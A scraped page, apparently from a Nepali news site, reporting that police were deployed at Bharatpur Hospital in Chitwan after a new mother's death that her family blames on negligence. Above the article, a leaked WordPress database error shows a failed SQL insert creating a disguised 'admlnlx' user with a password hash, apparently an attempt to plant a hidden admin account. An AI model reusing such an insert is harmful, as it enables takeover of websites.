WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwXN.799oy/pKR6HtE1a7NERiEIA.k/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 00:59:11', '', 'admlnlx', 'admlnlx')
चितवन, माघ २९–
चितवनको भरतपुर अस्पतालमा सुत्केरीको मृत्यु भएपछि अस्पतालमा प्रहरी परिचालन गरिएको छ । संभावित घटनालाई मध्यनजर गर्दै प्रहरी परिचालन गरिएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ । अस्पतालको लापरबाहीका कारण सुत्केरी महिलाको मृत्यु भएको भन्दै पीडित परिवार अस्पतालमा भेला भएपछि प्रहरी परिचालन गरिएको हो । जिल्ला प्रहरी कार्यालय चितवनले दिएको जानकारी अनुसार अत्याधिक रक्तश्रावका कारण गोरखाको ११ किलोका विष्णु श्रेष्ठकी श्रीमती ३४ वर्षीया विमला श्रेष्ठ मृत्यु भएको हो । श्रेष्ठलाई यही माघ २६ गते सुत्केरी गराउन भरतपुर अस्पतालमा ल्याइएको थियो। उनले बच्चा जन्माइसकेपछि शुक्रबार मृत्यु भएपछि उनका आफन्तले अस्पतालको लापरबाहीले मृत्यु भएको आरोप लगाएको छ।